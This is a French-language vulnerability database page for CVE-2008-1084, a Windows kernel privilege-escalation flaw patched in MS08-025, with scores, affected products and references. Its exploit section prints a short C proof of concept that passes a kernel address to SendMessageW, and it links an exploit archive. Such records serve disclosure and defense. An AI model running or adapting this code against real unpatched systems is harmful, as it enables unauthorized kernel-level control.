CVE-2008-1084 : Détail

CVE-2008-1084

Code Injection
A03-Injection
16.96%V4
Local
2008-04-08
21h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 31585

Date de publication : 2008-04-07 22h00 +00:00
Auteur : Whitecell
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/28554/info Microsoft Windows is prone to a local privilege-escalation vulnerability. The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system. */ #include #include int main(int argc,char *argv[]) { DWORD dwHookAddress = 0x80000000; printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" ); printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress ); return 0; }
Exploit Database EDB-ID : 5518

Date de publication : 2008-04-27 22h00 +00:00
Auteur : Ruben Santamarta
EDB Vérifié : Yes

// ms08-25-exploit #1 // This exploit takes advantage of one of the vulnerabilities // patched in the Microsoft Security bulletin MS08-25 // http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx // --------------------------------------- // Modifications are strictly prohibited. // For research purposes ONLY. // --------------------------------------- // Ruben Santamarta // www.reversemode.com https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) # milw0rm.com [2008-04-28]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Références

http://www.us-cert.gov/cas/techalerts/TA08-099A.html
Tags : third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=120845064910729&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/28554
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=120845064910729&w=2
Tags : vendor-advisory, x_refsource_HP
https://www.exploit-db.com/exploits/5518
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/29720
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019803
Tags : vdb-entry, x_refsource_SECTRACK